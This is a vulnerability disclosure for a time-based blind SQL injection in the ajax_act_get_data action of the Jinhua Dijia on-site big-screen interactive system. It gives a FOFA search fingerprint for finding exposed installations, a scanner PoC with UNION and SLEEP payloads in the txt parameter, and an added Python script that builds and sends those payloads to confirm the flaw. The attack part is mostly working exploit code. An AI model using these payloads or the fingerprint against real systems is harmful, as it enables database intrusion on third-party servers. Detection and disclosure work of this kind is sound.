Vulnerability description
The Jinhua Dijia on-site big-screen interactive system (金华迪加现场大屏互动系统) has a SQL injection in the ajax_act_get_data action of its importlottery module (/Modules/module.php?m=importlottery&c=admin&a=ajax_act_get_data). The txt parameter is concatenated into a SQL query: the PoC below closes the quoted pattern with %"), appends a five-column UNION SELECT, and confirms the injection as a time-based blind one by requiring the response latency to track SLEEP(5) and then SLEEP(10), so that a server that is merely slow is not reported as vulnerable.
FOFA fingerprint: body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"
id: jinhuadijia-daping-ajax-act-get-data-sqli

info:
  name: Jinhua Dijia on-site big-screen interactive system SQL injection in ajax_act_get_data
  author: AVIC123
  severity: high
  verified: true
  description: |
    The Jinhua Dijia on-site big-screen interactive system (金华迪加现场大屏互动系统) has a SQL injection in ajax_act_get_data.
    fofa: body="/wall/themes/meepo/assets/images/defaultbg.jpg" || title="现场活动大屏幕系统"
  reference:
    - https://vip.bdziyi.com/58465/
  tags: jinhuadijia,daping,sqli
  created: 2025/08/20

set:
  hostname: request.url.host
rules:
  r0:
    request:
      method: GET
      path: /Modules/module.php?m=importlottery&c=admin&a=ajax_act_get_data&txt=%") union select 1,2,3,md5(1),5 AND (SELECT 4595 FROM (SELECT(SLEEP(5)))ZZjy)#
    expression: response.status == 200 && response.latency <= 7000 && response.latency >= 5000
  r1:
    request:
      method: GET
      path: /Modules/module.php?m=importlottery&c=admin&a=ajax_act_get_data&txt=%") union select 1,2,3,md5(1),5 AND (SELECT 4595 FROM (SELECT(SLEEP(10)))ZZjy)#
    expression: response.status == 200 && response.latency <= 12000 && response.latency >= 10000
expression: r0() && r1()
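The same two-probe timing check written as a stand-alone script, as an added example that is not part of the original PoC or of the vendor's code. It builds the URL with the PoC's payload (URL-encoded on the wire, which is what the scanner does with the raw characters shown above), measures latency for SLEEP(5) and SLEEP(10), and only reports the host when both latencies land in the window the rules expect. The hostname http://target.example, the fetch-function signature and the simulated responder are assumptions used so the logic can be exercised offline.

```python
"""Time-based blind SQLi confirmation for ajax_act_get_data (added example)."""
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, Tuple

# Assumed transport interface: full URL in, (status, latency in ms) out.
Fetcher = Callable[[str], Tuple[int, float]]

PATH = "/Modules/module.php"
PARAMS = {"m": "importlottery", "c": "admin", "a": "ajax_act_get_data"}


def build_payload(seconds: int) -> str:
    # Payload from the PoC: close the quoted pattern, UNION a five-column row,
    # then force a delay through a derived-table SLEEP subquery.
    return (
        '%") union select 1,2,3,md5(1),5 AND '
        f"(SELECT 4595 FROM (SELECT(SLEEP({seconds})))ZZjy)#"
    )


def build_url(base: str, seconds: int) -> str:
    # urlencode percent-encodes %, ", space, ( ) and # so the server decodes
    # exactly the characters the PoC shows in its raw path.
    query = urllib.parse.urlencode({**PARAMS, "txt": build_payload(seconds)})
    return f"{base.rstrip('/')}{PATH}?{query}"


def probe_matches(status: int, latency_ms: float, seconds: int,
                  slack_ms: float = 2000.0) -> bool:
    # Mirrors each rule's expression: HTTP 200 and latency within
    # [SLEEP seconds, SLEEP seconds + 2 s].
    lower = seconds * 1000
    return status == 200 and lower <= latency_ms <= lower + slack_ms


def is_vulnerable(base: str, fetch: Fetcher, delays=(5, 10)) -> bool:
    # Two different delays: a host that is simply slow cannot track both
    # windows, which is why the PoC requires r0() && r1().
    for seconds in delays:
        status, latency_ms = fetch(build_url(base, seconds))
        if not probe_matches(status, latency_ms, seconds):
            return False
    return True


def http_fetch(url: str, timeout: float = 15.0) -> Tuple[int, float]:
    # Real transport for use against an authorised target; timeout must exceed
    # the longest SLEEP plus slack (10 s + 2 s) or the probe is cut short.
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            status = resp.status
    except urllib.error.HTTPError as err:
        status = err.code
    return status, (time.monotonic() - start) * 1000.0


def simulated_fetch(url: str) -> Tuple[int, float]:
    # Constructed stand-in for a vulnerable host: read SLEEP(n) back out of the
    # decoded txt parameter and answer 200 after n seconds plus 300 ms overhead.
    txt = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)["txt"][0]
    n = int(txt.split("SLEEP(")[1].split(")")[0])
    return 200, n * 1000.0 + 300.0


if __name__ == "__main__":
    # Offline demonstration; swap simulated_fetch for http_fetch on a real host.
    print(is_vulnerable("http://target.example", simulated_fetch))
```

A single SLEEP(5) probe alone would also be satisfied by any backend that happens to take five to seven seconds to answer; the second probe at SLEEP(10) forces the latency to move with the injected value, which is the check that separates injection from slowness.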